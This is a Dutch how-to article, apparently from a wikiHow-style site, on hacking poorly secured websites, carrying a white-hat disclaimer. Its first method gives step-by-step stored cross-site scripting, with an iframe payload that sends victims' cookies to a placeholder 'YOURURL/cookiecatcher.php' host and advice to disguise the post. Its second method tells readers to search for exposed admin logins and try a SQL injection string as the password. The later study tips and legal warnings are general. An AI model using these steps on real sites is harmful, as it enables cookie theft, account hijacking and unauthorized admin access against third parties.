PDF download Pdf downloaden PDF download Pdf downloaden

Let op: Deze 'How To' is alleen bedoeld voor educatieve doeleinden, hetzij om mensen te helpen leren wat White Hat hacken is, of om te begrijpen hoe hackers te werk gaan en op die manier eigen sites beter te kunnen beschermen. Deze tutorial laat zien hoe hackers toegang kunnen krijgen tot websites die niet goed zijn beveiligd.

Methode 1
Methode 1 van 3:

Cross Site scripting

PDF download Pdf downloaden
  1. Een messageboard of forum is een goed voorbeeld. Onthoud wel dat als de site goed is bescherm, deze methode niet werkt.
  2. Je zal een bepaald type code in de "post" op moeten nemen waarmee alle data wordt onderschept van iedereen die erop klikt.
    • Test of het systeem de code uitfiltert. Post
      <script>window.alert(“test”)</script>
      Als er een melding verschijnt wanneer je op de post klikt, dan is de site kwetsbaar.
  3. Het doel van deze aanval is het onderscheppen van de cookies van een gebruiker, zodat je toegang krijgt tot hun account waarbij gebruik wordt gemaakt van onveilige aanmeldprocedures. De cookie catcher zal de cookies van het slachtoffer opvangen en omleiden. Upload de catcher naar een website waar je toegang tot hebt en php ondersteunt. Een voorbeeld hiervan kun je vinden in het gedeelte met voorbeelden.
  4. Plaats de code in de post, zodat je cookies kunt onderscheppen en doorsturen naar je eigen website. Wat hackers dan doen is er tekst bij plaatsen die er onschuldig uitziet en te voorkomen dat de post word verwijderd.
    • Een voorbeeldcode ziet er zo uit:
      <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
  5. Hierna zijn de gegevens in de cookies te gebruiken, omdat ze opgeslagen zijn op de eigen website.
    Advertentie
Methode 2
Methode 2 van 3:

Het uitvoeren van injection attacks

PDF download Pdf downloaden
  1. Je zal een site moeten vinden die onveilig is, vanwege een gemakkelijk toegankelijke admin login. Zoek op Google naar admin login.asp.
  2. Typ admin als de gebruikersnaam en gebruik een aantal tekenreeksen als wachtwoord. Een voorbeeld hiervan is 1’of ’1’=’1.
  3. Dit vergt waarschijnlijk wat proberen en nogmaals proberen.
  4. Uiteindelijk zou je in staat moeten zijn om een tekenreeks te vinden waarmee je toegang kunt krijgen tot de website als beheerder, aangenomen dat het hier gaat om een slecht of niet beveiligde website.
    Advertentie
Methode 3
Methode 3 van 3:

Succes afdwingen

PDF download Pdf downloaden
  1. Als je echt wilt leren hoe je websites kunt hacken, dan zal je echt moeten begrijpen hoe computers en programmeertalen werken. Leer programmeertalen zoals Python of SQL, zodat je meer controle hebt over computers en kwetsbare onderdelen van systemen kunt herkennen.
  2. Je hebt ook veel kennis nodig van html en javascript, zeker als het gaat om het beveiligen van websites. Dit kan tijd kosten om te leren maar op internet is alle informatie aanwezig, dus als je wilt kun je alles leren wat nodig is.
  3. White hats zijn hackers die hun krachten voor goede zaken aanwenden, waarbij ze beveiligingslekken blootleggen en ervoor zorgen dat het internet een betere plek wordt voor iedereen. Als je het hacken wilt leren om hier iets goeds mee te doen, zoals bijvoorbeeld het beveiligen van je eigen site, zoek dan de hulp van white hats met meer ervaring.
  4. Als je wilt leren hoe je kunt hacken of gewoon jezelf wilt beschermen, dan zal je veel onderzoek moeten doen. Er zijn zoveel verschillende manieren waarop een website kwetsbaar kan zijn, en deze lijst verandert voortdurend, dus je zult constant moeten blijven bijleren.
  5. Omdat de lijst met mogelijke hacks voortdurend verandert, moet je ervoor zorgen dat je up-to-date blijft. Alleen maar omdat je site beschermd is tegen een bepaalde vorm van hacken betekent nog niet dat dit zo blijft!
    Advertentie

Tips

  • Bezoek hacker-forums voor ladingen handige tips.
Advertentie

Waarschuwingen

  • Hacken van computers en websites anders dan die van jezelf is strafbaar. Oefen deze vaardigheden zodat je eigen sites en die van anderen beter kunt beveiligen.
  • Als je dit artikel hebt gelezen, dan ben je niet meteen een hacker. Je zal veel moeten lezen, leren en oefenen.
Advertentie

Over dit artikel

Deze pagina is 18.970 keer bekeken.

Was dit artikel nuttig?

Advertentie